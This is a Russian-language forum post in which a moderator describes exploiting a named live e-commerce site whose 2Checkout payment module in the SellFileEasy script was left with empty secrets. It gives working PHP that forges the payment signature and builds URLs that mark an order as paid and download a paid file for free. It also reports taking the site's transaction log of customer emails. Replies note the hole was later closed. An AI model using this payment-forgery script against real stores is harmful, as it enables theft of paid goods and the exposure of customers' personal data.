За последнюю неделю опубликовано 77 новых материалов.
Инструкция новичку Путеводитель по форуму Прокси для Telegram Показать подсказки , это бомба!

Почему нужно удалять неиспользуемые функции или новая жертва - open-cart.ru

  • Поучаствуй (в качестве покупателя) в любых пяти совместных покупках (кроме завершённых и "Моментальных") и получи группу "Новичок" навсегда -> ссылка на раздел
  • Получай до 480 рублей за каждого приглашенного пользователя!
    представляем Вам очередное расширение партнерской программы, подробности описаны тут -> ссылка
  • 90% материалов доступно к скачиванию после простой регистрации!
    Если же ты хочешь скачивать материалы без требования оставлять отзывы то получи группу "Новичок", 10 способов повышения описаны тут -> ссылка
  • К сожалению количество битых ссылок растет и мы уже не можем их оперативно восстанавливать поэтому просим помощи у каждого нашего пользователя.
    С сегодняшнего дня, за каждую восстановленную ссылку мы заплатим Вам.
    Подробнее тут -> ссылка
  • Перенесем твои заслуги с другого ресурса!
    Мы понимаем как сложно прокачивать аккаунты на форумах, вроде раскачал аккаунт, а тут появляется ресурс в 100 раз круче но тоже с системой прокачки и снова качать аккаунт...
    Предлагаем вам перенести Ваши заслуги на другом подобном ресурсе к нам.
    Подробности описаны тут -> ссылка
  • Вы можете получать по 2.5% с каждой покупки и продажи на маркете! Подробности в теме Партнёрская программа

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.110
10.197
140
Питер
Новая жертва - сайтец open-cart.ru.

Админ этого сайта вообще не стал заморачиваться и повесил для продажи архивов скрипт SellFileEasy. Купил он его или нет это другой и не интересный вопрос.
Сам по себе скрипт крепкий, но наш пациент опять же не стал заморачиваться с отключением ненужных платежных систем что и сыграло с ним злую шутку.

Оказалась включена платёжка 2Checkout и не просто включена, а значения секретных переменных, таких как секрет и id кошелька, были оставлены пустыми.
Не стоит никаких трудов получить секретный хеш и выдать себя за платежку чтобы сделать счёт оплаченным.

На коленке пишем скрипт:
PHP:
$co_password = "";
$sid = "";
$out_summ = '1000.00';
$hashOrder = md5('83659507df7f4323'.time());
$inv_id = md5('83659507df7f4323'.time());
$price = '1000.00';
$Shp_file = '600/Royal_2.1.x.zip';
$Shp_email = 'i694062@3424.com';
$my_crc = strtoupper(md5($sid.$inv_id.number_format($price, 2, '.', '').$co_password.$Shp_email.$Shp_file));
$StringToHash = strtoupper(md5($co_password . $sid . $hashOrder . $out_summ));

echo 'Сначала по этой ссылке<br>';
echo 'http://open-cart.ru/sellfileeasy/2checkout/result.php?total='.$out_summ.'&order_number='.$hashOrder.'&li_0_product_id='.$hashOrder.'&li_0_price='.$out_summ.'&li_0_file='.$Shp_file.'&li_0_email='.$Shp_email.'&li_0_checkout_sign='.$my_crc.'&key='.$StringToHash;
echo '<br>Теперь по этой<br>';
echo 'http://open-cart.ru/sellfileeasy/download.php?hash='.$my_crc.'&file='.$Shp_file;
$Shp_file = Это адрес файла, его видно в адресной строке на странице оплаты файла. (Да простит меня разработчик шаблона Royal)

Переходим по первой ссылке, потом по второй и усё, качаем файл.
Конкретно тут в архиве оказался текстовый файл с сылкой.
Снимок.PNG

Так же удалось стянуть файл transaction.log с списком всех транзакций. Вот кусочек.
Снимок.PNG

Если вы увидели там свою почту, то айяйяй :vinsent: все почты перекочевали в чёрный список панели лицензирования)
Можете попробовать добраться до файла config.php. Сами) :sarcastic_hand:

О уязвимости сообщено, но так как ресурс open-cart.ru не совсем честный, на момент публикации уязвимость работает.

Мораль. Не покупайте ничего в сомнительных местах и у сомнительных личностей) Или хотя-бы пользуйтесь одноразовыми почтами.
 
Последнее редактирование:

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.110
10.197
140
Питер
Не совсем понятно,где эта панель?
Этой панелью пользуются разработчики и собственно только они имеют туда доступ.
Попасть в черный список не страшно, просто твоя почта в списке лицензий разработчика будет подсвечена красным, никаких санкций или ограничений это не несет, не переживай)
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.110
10.197
140
Питер
UPD
Одмин сего ресурса вместо того чтобы исправить уязвимость и сказать "Спасибо" после того как я ему о ней сообщил, поступил по мудацки и заблочил ip прокси через который я работал с его ресурсом :clapping:
Уязвимость работает.
Закрой дыру блеать! :punish:
 
UPD
Админ реабилитировался закрыв дыру и сказав спасибо. Будьте внимательны.
 

Привет!

Мы группа людей которые решили помочь другим в решении их проблем, а так же пользователям с поиском самых свежих и качественных инфопродуктов. За 4 с небольшим месяца мы создали этот форум на который заходят ежедневно тысячи человек и посещаемость постоянно растёт. Мы создали панель лицензирования для защиты PHP скриптов от воровства и SEO панель для мониторинга наших сайтов и выбора верной стратегии их развития. Мы надеемся что то что мы создали пригодится Вам и возможно Вы поможете нам развиваться и совершенствоваться вместе с Вами.

Статистика форума

Темы
384.684
Сообщения
427.970
Пользователи
59.197
Новый пользователь
Shahovsk

Приложения форума для iOS и Android


У ркн там нет власти ;)
Приватные разговоры
Помощь Пользователи
    Вы не присоединились ни к одной комнате.